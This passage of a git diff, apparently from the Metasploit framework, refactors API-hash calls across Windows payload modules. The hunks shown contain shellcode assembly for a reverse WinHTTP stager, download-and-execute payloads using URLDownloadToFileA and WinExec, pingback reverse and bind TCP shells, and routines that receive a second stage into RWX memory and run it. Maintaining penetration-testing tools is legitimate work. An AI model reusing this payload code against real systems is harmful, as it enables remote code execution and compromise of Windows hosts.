mov rdx, rsi ; the newly received second stage length. xor rcx, rcx ; NULL as we dont care where the allocation is. - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call rbp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); ; Receive the second stage and execute it... mov rbx, rax ; rbx = our new memory address for the new stage @@ -239,7 +239,7 @@ def asm_block_recv(opts={}) mov r8, rsi ; length mov rdx, rbx ; the current address into our second stages RWX buffer mov rcx, rdi ; the saved socket - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')} + mov r10d, #{block_api_hash('ws2_32.dll', 'recv')} call rbp ; recv( s, buffer, length, 0 ); ^ @@ -258,14 +258,14 @@ def asm_block_recv(opts={}) pop r8 ; dwFreeType push 0 ; 0 pop rdx ; dwSize - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')} + mov r10d, #{block_api_hash('kernel32.dll', 'VirtualFree')} call rbp ; VirtualFree(payload, 0, MEM_COMMIT) cleanup_socket: ; clean up the socket push rdi ; socket handle pop rcx ; s (closesocket parameter) - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')} + mov r10d, #{block_api_hash('ws2_32.dll', 'closesocket')} call rbp ; and try again diff --git a/lib/msf/core/payload/windows/x64/reverse_win_http_x64.rb b/lib/msf/core/payload/windows/x64/reverse_win_http_x64.rb index 2e862c9e03a66..ea333c13bc230 100644 --- a/lib/msf/core/payload/windows/x64/reverse_win_http_x64.rb +++ b/lib/msf/core/payload/windows/x64/reverse_win_http_x64.rb @@ -205,7 +205,7 @@ def asm_reverse_winhttp(opts={}) mov r14, 'winhttp' push r14 ; Push 'winhttp',0 onto the stack mov rcx, rsp ; lpFileName (stackpointer) - mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} ; LoadLibraryA + mov r10d, #{block_api_hash('kernel32.dll', 'LoadLibraryA')} ; LoadLibraryA call rbp ^ @@ -216,7 +216,7 @@ def asm_reverse_winhttp(opts={}) mov r14, 'crypt32' push r14 ; Push 'crypt32',0 onto the stack mov rcx, rsp ; lpFileName (stackpointer) - mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} ; LoadLibraryA + mov r10d, #{block_api_hash('kernel32.dll', 'LoadLibraryA')} ; LoadLibraryA call rbp ^ end @@ -249,7 +249,7 @@ def asm_reverse_winhttp(opts={}) xor r9, r9 ; pwszProxyBypass (NULL) push rbx ; stack alignment push rbx ; dwFlags (0) - mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpOpen')}; WinHttpOpen + mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpOpen')}; WinHttpOpen call rbp ^ @@ -267,7 +267,7 @@ def asm_reverse_winhttp(opts={}) mov rcx, rax ; hSession mov r8, #{opts[:port]} ; nServerPort xor r9, r9 ; dwReserved - mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpConnect')} ; WinHttpConnect + mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpConnect')} ; WinHttpConnect call rbp call winhttpopenrequest @@ -305,7 +305,7 @@ def asm_reverse_winhttp(opts={}) push rax push rbx ; lppwszAcceptType (NULL) push rbx ; pwszReferer (NULL) - mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpOpenRequest')} ; WinHttpOpenRequest + mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpOpenRequest')} ; WinHttpOpenRequest call rbp prepare: @@ -322,7 +322,7 @@ def asm_reverse_winhttp(opts={}) mov rdx, 0x1002 ; (0x1002=WINHTTP_OPTION_PROXY_USERNAME) push #{proxy_user.length} ; dwBufferLength (proxy_user length) pop r9 - mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption + mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption call rbp ^ end @@ -337,7 +337,7 @@ def asm_reverse_winhttp(opts={}) mov rdx, 0x1003 ; (0x1003=WINHTTP_OPTION_PROXY_PASSWORD) push #{proxy_pass.length} ; dwBufferLength (proxy_pass length) pop r9 - mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption + mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption call rbp ^ end @@ -349,7 +349,7 @@ def asm_reverse_winhttp(opts={}) sub rax, 32 mov rdi, rsp ; save a pointer to this buffer mov rcx, rdi ; this buffer is also the parameter to the function - mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpGetIEProxyConfigForCurrentUser')} ; WinHttpGetIEProxyConfigForCurrentUser + mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpGetIEProxyConfigForCurrentUser')} ; WinHttpGetIEProxyConfigForCurrentUser call rbp test eax, eax ; skip the rest of the proxy stuff if the call failed @@ -385,7 +385,7 @@ def asm_reverse_winhttp(opts={}) mov rdx, r13 ; lpcwszUrl ; finally make the call - mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpGetProxyForUrl')} ; WinHttpGetProxyForUrl + mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpGetProxyForUrl')} ; WinHttpGetProxyForUrl call rbp test eax, eax ; skip the rest of the proxy stuff if the call failed @@ -412,7 +412,7 @@ def asm_reverse_winhttp(opts={}) mov rcx, rsi ; hConnection (connection handle) push 38 pop rdx ; (38=WINHTTP_OPTION_PROXY) - mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption + mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption call rbp ie_proxy_setup_finish: @@ -439,7 +439,7 @@ def asm_reverse_winhttp(opts={}) mov r8, rsp ; lpBuffer (pointer to flags) push 4 pop r9 ; dwBufferLength (4 = size of flags) - mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption + mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption call rbp xor r8, r8 ; dwHeadersLen (0) @@ -469,7 +469,7 @@ def asm_reverse_winhttp(opts={}) push rbx ; dwContext (0) push rbx ; dwTotalLength (0) push rbx ; dwOptionalLength (0) - mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSendRequest')} ; WinHttpSendRequest + mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpSendRequest')} ; WinHttpSendRequest call rbp test eax, eax jnz handle_response @@ -497,7 +497,7 @@ def asm_reverse_winhttp(opts={}) asm << %Q^ failure: ; hard-coded to ExitProcess(whatever) for size - mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')} + mov r10d, #{block_api_hash('kernel32.dll', 'ExitProcess')} call rbp ; ExitProcess(whatever) ^ end @@ -507,7 +507,7 @@ def asm_reverse_winhttp(opts={}) mov rcx, rsi ; hRequest push rbx pop rdx ; lpReserved (NULL) - mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReceiveResponse')} ; WinHttpReceiveResponse + mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpReceiveResponse')} ; WinHttpReceiveResponse call rbp test eax, eax ; make sure the request succeeds jz failure @@ -527,7 +527,7 @@ def asm_reverse_winhttp(opts={}) push rbx ; 0 for alignment push 8 ; One whole pointer mov r9, rsp ; Stack pointer (lpdwBufferLength) - mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpQueryOption')} + mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpQueryOption')} call rbp test eax, eax ; use eax instead of rax, saves a byte jz failure ; Bail out if we couldn't get the certificate context @@ -542,7 +542,7 @@ def asm_reverse_winhttp(opts={}) mov r14, r8 ; Back the stack pointer up for later use push 3 pop rdx ; CERT_SHA1_HASH_PROP_ID (dwPropId) - mov r10, #{Rex::Text.block_api_hash('crypt32.dll', 'CertGetCertificateContextProperty')} + mov r10d, #{block_api_hash('crypt32.dll', 'CertGetCertificateContextProperty')} call rbp test eax, eax ; use eax instead of rax, saves a byte jz failure ; Bail out if we couldn't get the certificate context @@ -574,7 +574,7 @@ def asm_reverse_winhttp(opts={}) push 4 pop r8 ; dwNumberOfBytesToRead (4 bytes) mov rcx, rsi ; hFile (request handle) - mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReadData')} ; WinHttpReadData + mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpReadData')} ; WinHttpReadData call rbp test eax, eax ; did the download fail? jz failure @@ -589,7 +589,7 @@ def asm_reverse_winhttp(opts={}) push 0x40 pop r9 ; flProtect (0x40=PAGE_EXECUTE_READWRITE) mov r8, 0x1000 ; flAllocationType (0x1000=MEM_COMMIT) - mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call rbp ;download stage @@ -602,7 +602,7 @@ def asm_reverse_winhttp(opts={}) mov r8, rax ; dwNumberOfBytesToRead (incoming stage size) mov rdx, rbx ; lpBuffer (pointer to mem) mov r9, rdi ; lpdwNumberOfByteRead (stack pointer) - mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReadData')} ; WinHttpReadData + mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpReadData')} ; WinHttpReadData call rbp add rsp, 32 ; clean up reserved space test eax, eax ; did the download fail? @@ -619,7 +619,7 @@ def asm_reverse_winhttp(opts={}) mov r9, rdx ; flProtect (0x40=PAGE_EXECUTE_READWRITE) shl edx, 16 ; dwSize mov r8, 0x1000 ; flAllocationType (0x1000=MEM_COMMIT) - mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} ; VirtualAlloc + mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')} ; VirtualAlloc call rbp download_prep: @@ -633,7 +633,7 @@ def asm_reverse_winhttp(opts={}) mov rdx, rbx ; lpBuffer (pointer to mem) mov r8, 8192 ; dwNumberOfBytesToRead (8k) mov r9, rdi ; lpdwNumberOfByteRead (stack pointer) - mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReadData')} ; WinHttpReadData + mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpReadData')} ; WinHttpReadData call rbp add rsp, 32 ; clean up reserved space diff --git a/lib/msf/core/payload/windows/x64/send_uuid_x64.rb b/lib/msf/core/payload/windows/x64/send_uuid_x64.rb index 7266757b930c6..fc60c6df95f68 100644 --- a/lib/msf/core/payload/windows/x64/send_uuid_x64.rb +++ b/lib/msf/core/payload/windows/x64/send_uuid_x64.rb @@ -30,7 +30,7 @@ def asm_send_uuid(uuid=nil) get_uuid_address: pop rdx ; UUID address mov rcx, rdi ; Socket handle - mov r10, #{Rex::Text.block_api_hash('ws2_32.dll', 'send')} + mov r10d, #{block_api_hash('ws2_32.dll', 'send')} call rbp ; call send ^ diff --git a/lib/msf/util/exe/windows/common.rb b/lib/msf/util/exe/windows/common.rb index ed0deac66638d..711ddff6597e7 100644 --- a/lib/msf/util/exe/windows/common.rb +++ b/lib/msf/util/exe/windows/common.rb @@ -578,6 +578,7 @@ def to_dotnetmem(base = 0x12340000, data = '', opts = {}) # This wrapper is responsible for allocating RWX memory, copying the # target code there, setting an exception handler that calls ExitProcess # and finally executing the code. + # TODO: We should use the standardized version of block-api here and use randomized IV def win32_rwx_exec(code) stub_block = Rex::Payloads::Shuffle.from_graphml_file( File.join(Msf::Config.install_root, 'data', 'shellcode', 'block_api.x86.graphml'), diff --git a/modules/payloads/singles/windows/dns_txt_query_exec.rb b/modules/payloads/singles/windows/dns_txt_query_exec.rb index 672c863e8814a..ee88f8cd2e153 100644 --- a/modules/payloads/singles/windows/dns_txt_query_exec.rb +++ b/modules/payloads/singles/windows/dns_txt_query_exec.rb @@ -96,7 +96,7 @@ def generate(_opts = {}) push eax ; flAllocationType MEM_COMMIT (0x1000) push eax ; dwSize (0x1000) push 0x0 ; lpAddress - push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + push #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call ebp push eax ; save pointer on stack, will be used in memcpy mov #{bufferreg}, eax ; save pointer, to jump to at the end @@ -110,7 +110,7 @@ def generate(_opts = {}) push eax ; push 'dnsapi' to the stack push 0x61736e64 ; ... push esp ; Push a pointer to the 'dnsapi' string on the stack. - push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + push #{block_api_hash('kernel32.dll', 'LoadLibraryA')} call ebp ; LoadLibraryA( "dnsapi" ) ;prepare for loop of queries @@ -133,7 +133,7 @@ def generate(_opts = {}) push #{queryoptions} ; Options push #{w_type} ; wType push eax ; lpstrName - push #{Rex::Text.block_api_hash('dnsapi.dll', 'DnsQuery_A')} + push #{block_api_hash('dnsapi.dll', 'DnsQuery_A')} call ebp ; test eax, eax ; query ok? jnz jump_to_payload ; no, jump to payload diff --git a/modules/payloads/singles/windows/download_exec.rb b/modules/payloads/singles/windows/download_exec.rb index cdd4d823279ce..5d4d8b471833c 100644 --- a/modules/payloads/singles/windows/download_exec.rb +++ b/modules/payloads/singles/windows/download_exec.rb @@ -50,8 +50,8 @@ def generate(_opts = {}) # ;0x00000200 ; INTERNET_FLAG_NO_UI" exitfuncs = { - 'THREAD' => Rex::Text.block_api_hash('kernel32.dll', 'ExitThread').to_i(16), # ExitThread - 'PROCESS' => Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess').to_i(16), # ExitProcess + 'THREAD' => block_api_hash('kernel32.dll', 'ExitThread').to_i(16), # ExitThread + 'PROCESS' => block_api_hash('kernel32.dll', 'ExitProcess').to_i(16), # ExitProcess 'SEH' => 0x00000000, # we don't care 'NONE' => 0x00000000 # we don't care } @@ -137,7 +137,7 @@ def generate(_opts = {}) push 0x696e6977 ; ... mov esi, esp ; Save a pointer to wininet push esp ; Push a pointer to the "wininet" string on the stack. - push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} ; hash( "kernel32.dll", "LoadLibraryA" ) + push #{block_api_hash('kernel32.dll', 'LoadLibraryA')} ; hash( "kernel32.dll", "LoadLibraryA" ) call ebp ; LoadLibraryA( "wininet" ) internetopen: @@ -147,7 +147,7 @@ def generate(_opts = {}) push edi ; LPCTSTR lpszProxyName push edi ; DWORD dwAccessType (PRECONFIG = 0) push esi ; LPCTSTR lpszAgent ("wininet\x00") - push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')} ; hash( "wininet.dll", "InternetOpenA" ) + push #{block_api_hash('wininet.dll', 'InternetOpenA')} ; hash( "wininet.dll", "InternetOpenA" ) call ebp jmp.i8 dbl_get_server_host @@ -163,7 +163,7 @@ def generate(_opts = {}) push #{port_nr} ; PORT push ebx ; HOSTNAME push eax ; HINTERNET hInternet - push #{Rex::Text.block_api_hash('wininet.dll', 'InternetConnectA')} ; hash( "wininet.dll", "InternetConnectA" ) + push #{block_api_hash('wininet.dll', 'InternetConnectA')} ; hash( "wininet.dll", "InternetConnectA" ) call ebp jmp.i8 get_server_uri @@ -179,7 +179,7 @@ def generate(_opts = {}) push ecx ; url push edx ; method push eax ; hConnection - push #{Rex::Text.block_api_hash('wininet.dll', 'HttpOpenRequestA')} ; hash( "wininet.dll", "HttpOpenRequestA" ) + push #{block_api_hash('wininet.dll', 'HttpOpenRequestA')} ; hash( "wininet.dll", "HttpOpenRequestA" ) call ebp mov esi, eax ; hHttpRequest @@ -195,7 +195,7 @@ def generate(_opts = {}) push eax ; &dwFlags push 31 ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS) push esi ; hRequest - push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')} ; hash( "wininet.dll", "InternetSetOptionA" ) + push #{block_api_hash('wininet.dll', 'InternetSetOptionA')} ; hash( "wininet.dll", "InternetSetOptionA" ) call ebp httpsendrequest: @@ -205,7 +205,7 @@ def generate(_opts = {}) push edi ; dwHeadersLength push edi ; headers push esi ; hHttpRequest - push #{Rex::Text.block_api_hash('wininet.dll', 'HttpSendRequestA')} ; hash( "wininet.dll", "HttpSendRequestA" ) + push #{block_api_hash('wininet.dll', 'HttpSendRequestA')} ; hash( "wininet.dll", "HttpSendRequestA" ) call ebp test eax,eax jnz create_file @@ -237,7 +237,7 @@ def generate(_opts = {}) push 2 ; dwShareMode push 2 ; dwDesiredAccess push edi ; lpFileName - push #{Rex::Text.block_api_hash('kernel32.dll', 'CreateFileA')} ; kernel32.dll!CreateFileA + push #{block_api_hash('kernel32.dll', 'CreateFileA')} ; kernel32.dll!CreateFileA call ebp download_prep: @@ -254,7 +254,7 @@ def generate(_opts = {}) push eax ; read length push ecx ; target buffer on stack push esi ; hRequest - push #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')} ; hash( "wininet.dll", "InternetReadFile" ) + push #{block_api_hash('wininet.dll', 'InternetReadFile')} ; hash( "wininet.dll", "InternetReadFile" ) call ebp test eax,eax ; download failed? (optional?) @@ -272,20 +272,20 @@ def generate(_opts = {}) lea eax,[esp+0xc] ; get pointer to buffer push eax ; lpBuffer push ebx ; hFile - push #{Rex::Text.block_api_hash('kernel32.dll', 'WriteFile')} ; kernel32.dll!WriteFile + push #{block_api_hash('kernel32.dll', 'WriteFile')} ; kernel32.dll!WriteFile call ebp sub esp,4 ; set stack back to where it was jmp.i8 download_more close_and_run: push ebx - push #{Rex::Text.block_api_hash('kernel32.dll', 'CloseHandle')} ; kernel32.dll!CloseHandle + push #{block_api_hash('kernel32.dll', 'CloseHandle')} ; kernel32.dll!CloseHandle call ebp execute_file: push 0 ; don't show push edi ; lpCmdLine - push #{Rex::Text.block_api_hash('kernel32.dll', 'WinExec')} ; kernel32.dll!WinExec + push #{block_api_hash('kernel32.dll', 'WinExec')} ; kernel32.dll!WinExec call ebp thats_all_folks: diff --git a/modules/payloads/singles/windows/messagebox.rb b/modules/payloads/singles/windows/messagebox.rb index 072e165961419..6f614a58e857d 100644 --- a/modules/payloads/singles/windows/messagebox.rb +++ b/modules/payloads/singles/windows/messagebox.rb @@ -55,20 +55,20 @@ def generate(_opts = {}) exitfunc_asm = %( push 0 - push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')} + push #{block_api_hash('kernel32.dll', 'ExitProcess')} call ebp ) if datastore['EXITFUNC'].upcase.strip == 'THREAD' exitfunc_asm = %( - mov ebx, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitThread')} - push #{Rex::Text.block_api_hash('kernel32.dll', 'GetVersion')} + mov ebx, #{block_api_hash('kernel32.dll', 'ExitThread')} + push #{block_api_hash('kernel32.dll', 'GetVersion')} call ebp add esp,0x28 cmp al,0x6 jl use_exitthread ; is older than Vista or Server 2003 R2? cmp bl,0xe0 ; check if GetVersion change the hash stored in EBX jne use_exitthread - mov ebx, #{Rex::Text.block_api_hash('ntdll.dll', 'RtlExitUserThread')} + mov ebx, #{block_api_hash('ntdll.dll', 'RtlExitUserThread')} use_exitthread: push 0 push ebx @@ -85,7 +85,7 @@ def generate(_opts = {}) call get_user32 db "user32.dll", 0x00 get_user32: - push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + push #{block_api_hash('kernel32.dll', 'LoadLibraryA')} call ebp push #{style} call get_title @@ -95,7 +95,7 @@ def generate(_opts = {}) db "#{datastore['TEXT']}", 0x00 get_text: push 0 - push #{Rex::Text.block_api_hash('user32.dll', 'MessageBoxA')} + push #{block_api_hash('user32.dll', 'MessageBoxA')} call ebp #{exitfunc_asm} ) diff --git a/modules/payloads/singles/windows/pingback_bind_tcp.rb b/modules/payloads/singles/windows/pingback_bind_tcp.rb index ca866bfeef71e..011e5fc5cd44e 100644 --- a/modules/payloads/singles/windows/pingback_bind_tcp.rb +++ b/modules/payloads/singles/windows/pingback_bind_tcp.rb @@ -63,14 +63,14 @@ def generate(_opts = {}) push 0x00003233 ; Push the bytes 'ws2_32',0,0 onto the stack. push 0x5F327377 ; ... push esp ; Push a pointer to the "ws2_32" string on the stack. - push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + push #{block_api_hash('kernel32.dll', 'LoadLibraryA')} call ebp ; LoadLibraryA( "ws2_32" ) mov eax, 0x0190 ; EAX = sizeof( struct WSAData ) sub esp, eax ; alloc some space for the WSAData structure push esp ; push a pointer to this struct push eax ; push the wVersionRequested parameter - push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')} + push #{block_api_hash('ws2_32.dll', 'WSAStartup')} call ebp ; WSAStartup( 0x0190, &WSAData ); push 11 @@ -86,7 +86,7 @@ def generate(_opts = {}) ; we do not specify a protocol [5] push 1 ; push SOCK_STREAM push #{addr_fam} ; push AF_INET/6 - push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')} + push #{block_api_hash('ws2_32.dll', 'WSASocketA')} call ebp ; WSASocketA( AF_INET/6, SOCK_STREAM, 0, 0, 0, 0 ); xchg edi, eax ; save the socket for later, don't care about the value of eax after this @@ -97,24 +97,24 @@ def generate(_opts = {}) push #{sockaddr_size} ; length of the sockaddr_in struct (we only set the first 8 bytes, the rest aren't used) push esi ; pointer to the sockaddr_in struct push edi ; socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'bind')} + push #{block_api_hash('ws2_32.dll', 'bind')} call ebp ; bind( s, &sockaddr_in, 16 ); test eax,eax ; non-zero means a failure jnz failure ; backlog, pushed earlier [3] push edi ; socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'listen')} + push #{block_api_hash('ws2_32.dll', 'listen')} call ebp ; listen( s, 0 ); ; we set length for the sockaddr struct to zero, pushed earlier [2] ; we dont set the optional sockaddr param, pushed earlier [1] push edi ; listening socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'accept')} + push #{block_api_hash('ws2_32.dll', 'accept')} call ebp ; accept( s, 0, 0 ); push edi ; push the listening socket xchg edi, eax ; replace the listening socket with the new connected socket for further comms - push #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')} + push #{block_api_hash('ws2_32.dll', 'closesocket')} call ebp ; closesocket( s ); send_pingback: @@ -124,12 +124,12 @@ def generate(_opts = {}) db #{uuid_as_db} ; PINGBACK_UUID get_pingback_address: push edi ; saved socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'send')} + push #{block_api_hash('ws2_32.dll', 'send')} call ebp ; call send push edi ; push the listening socket xchg edi, eax ; replace the listening socket with the new connected socket for further comms - push #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')} + push #{block_api_hash('ws2_32.dll', 'closesocket')} call ebp ; closesocket( s ); handle_connect_failure: @@ -140,7 +140,7 @@ def generate(_opts = {}) cleanup_socket: ; clear up the socket push edi ; socket handle - push #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')} + push #{block_api_hash('ws2_32.dll', 'closesocket')} call ebp ; closesocket(socket) failure: diff --git a/modules/payloads/singles/windows/pingback_reverse_tcp.rb b/modules/payloads/singles/windows/pingback_reverse_tcp.rb index c7edc2692c64f..7192c029fb928 100644 --- a/modules/payloads/singles/windows/pingback_reverse_tcp.rb +++ b/modules/payloads/singles/windows/pingback_reverse_tcp.rb @@ -62,7 +62,7 @@ def generate(_opts = {}) push '32' ; Push the bytes 'ws2_32',0,0 onto the stack. push 'ws2_' ; ... push esp ; Push a pointer to the "ws2_32" string on the stack. - push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + push #{block_api_hash('kernel32.dll', 'LoadLibraryA')} mov eax, ebp call eax ; LoadLibraryA( "ws2_32" ) @@ -70,7 +70,7 @@ def generate(_opts = {}) sub esp, eax ; alloc some space for the WSAData structure push esp ; push a pointer to this struct push eax ; push the wVersionRequested parameter - push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')} + push #{block_api_hash('ws2_32.dll', 'WSAStartup')} call ebp ; WSAStartup( 0x0190, &WSAData ); set_address: @@ -89,7 +89,7 @@ def generate(_opts = {}) push eax ; push SOCK_STREAM inc eax ; push eax ; push AF_INET - push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')} + push #{block_api_hash('ws2_32.dll', 'WSASocketA')} call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 ); xchg edi, eax ; save the socket for later, don't care about the value of eax after this @@ -97,7 +97,7 @@ def generate(_opts = {}) push 16 ; length of the sockaddr struct push esi ; pointer to the sockaddr struct push edi ; the socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'connect')} + push #{block_api_hash('ws2_32.dll', 'connect')} call ebp ; connect( s, &sockaddr, 16 ); test eax,eax ; non-zero means a failure @@ -119,13 +119,13 @@ def generate(_opts = {}) db #{uuid_as_db} ; PINGBACK_UUID get_pingback_address: push edi ; saved socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'send')} + push #{block_api_hash('ws2_32.dll', 'send')} call ebp ; call send cleanup_socket: ; clear up the socket push edi ; socket handle - push #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')} + push #{block_api_hash('ws2_32.dll', 'closesocket')} call ebp ; closesocket(socket) ^ if pingback_count > 0 @@ -136,7 +136,7 @@ def generate(_opts = {}) dec [esi+12] sleep: push #{pingback_sleep * 1000} - push #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')} + push #{block_api_hash('kernel32.dll', 'Sleep')} call ebp ;sleep(pingback_sleep * 1000) jmp create_socket ^ diff --git a/modules/payloads/singles/windows/x64/download_exec.rb b/modules/payloads/singles/windows/x64/download_exec.rb index 221dc54a9436b..6628432bed4dc 100644 --- a/modules/payloads/singles/windows/x64/download_exec.rb +++ b/modules/payloads/singles/windows/x64/download_exec.rb @@ -55,7 +55,7 @@ def generate(_opts = {}) LoadLibrary: pop rcx ; rcx points to the dll name. xor byte [rcx+10], 'K' ; null terminator - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + mov r10d, #{block_api_hash('kernel32.dll', 'LoadLibraryA')} call rbp ; LoadLibraryA("urlmon.dll") ; To live alone one must be an animal or a god, says Aristotle. There is yet a third case: one must be both--a philosopher. @@ -76,7 +76,7 @@ def generate(_opts = {}) xor r9,r9 ; 4th argument sub rsp, 8 push rcx ; 5th argument - mov r10d, #{Rex::Text.block_api_hash('urlmon.dll', 'URLDownloadToFileA')} + mov r10d, #{block_api_hash('urlmon.dll', 'URLDownloadToFileA')} call rbp SetCommand: @@ -86,7 +86,7 @@ def generate(_opts = {}) Exec: pop rcx ; 1st argument xor byte [rcx+#{file.length + 7}], 'F' ; null terminator - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'WinExec')} + mov r10d, #{block_api_hash('kernel32.dll', 'WinExec')} xor rdx, rdx ; 2nd argument ^ @@ -107,7 +107,7 @@ def generate(_opts = {}) if datastore['EXITFUNC'] == 'process' exit_asm = %( xor rcx,rcx - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')} + mov r10d, #{block_api_hash('kernel32.dll', 'ExitProcess')} call rbp ) payload << exit_asm @@ -115,7 +115,7 @@ def generate(_opts = {}) elsif datastore['EXITFUNC'] == 'thread' exit_asm = %( xor rcx,rcx - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitThread')} + mov r10d, #{block_api_hash('kernel32.dll', 'ExitThread')} call rbp ) payload << exit_asm diff --git a/modules/payloads/singles/windows/x64/messagebox.rb b/modules/payloads/singles/windows/x64/messagebox.rb index 77c7238b01218..46c3d18e1046b 100644 --- a/modules/payloads/singles/windows/x64/messagebox.rb +++ b/modules/payloads/singles/windows/x64/messagebox.rb @@ -51,20 +51,20 @@ def generate(_opts = {}) exitfunc_asm = %( xor rcx,rcx - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')} + mov r10d, #{block_api_hash('kernel32.dll', 'ExitProcess')} call rbp ) if datastore['EXITFUNC'].upcase.strip == 'THREAD' exitfunc_asm = %( - mov ebx, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitThread')} - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'GetVersion')} + mov ebx, #{block_api_hash('kernel32.dll', 'ExitThread')} + mov r10d, #{block_api_hash('kernel32.dll', 'GetVersion')} call rbp add rsp,0x28 cmp al,0x6 jl use_exitthread ; is older than Vista or Server 2003 R2? cmp bl,0xe0 ; check if GetVersion change the hash stored in EBX jne use_exitthread - mov ebx, #{Rex::Text.block_api_hash('ntdll.dll', 'RtlExitUserThread')} + mov ebx, #{block_api_hash('ntdll.dll', 'RtlExitUserThread')} use_exitthread: push 0 @@ -84,7 +84,7 @@ def generate(_opts = {}) db "user32.dll", 0x00 get_user32: pop rcx - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + mov r10d, #{block_api_hash('kernel32.dll', 'LoadLibraryA')} call rbp mov r9, #{style} call get_text @@ -96,7 +96,7 @@ def generate(_opts = {}) get_title: pop r8 xor rcx,rcx - mov r10d, #{Rex::Text.block_api_hash('user32.dll', 'MessageBoxA')} + mov r10d, #{block_api_hash('user32.dll', 'MessageBoxA')} call rbp exitfunk: #{exitfunc_asm} diff --git a/modules/payloads/singles/windows/x64/pingback_reverse_tcp.rb b/modules/payloads/singles/windows/x64/pingback_reverse_tcp.rb index a770635214a83..b6026137b0405 100644 --- a/modules/payloads/singles/windows/x64/pingback_reverse_tcp.rb +++ b/modules/payloads/singles/windows/x64/pingback_reverse_tcp.rb @@ -4,7 +4,7 @@ ## module MetasploitModule - CachedSize = 425 + CachedSize = 422 include Msf::Payload::Windows include 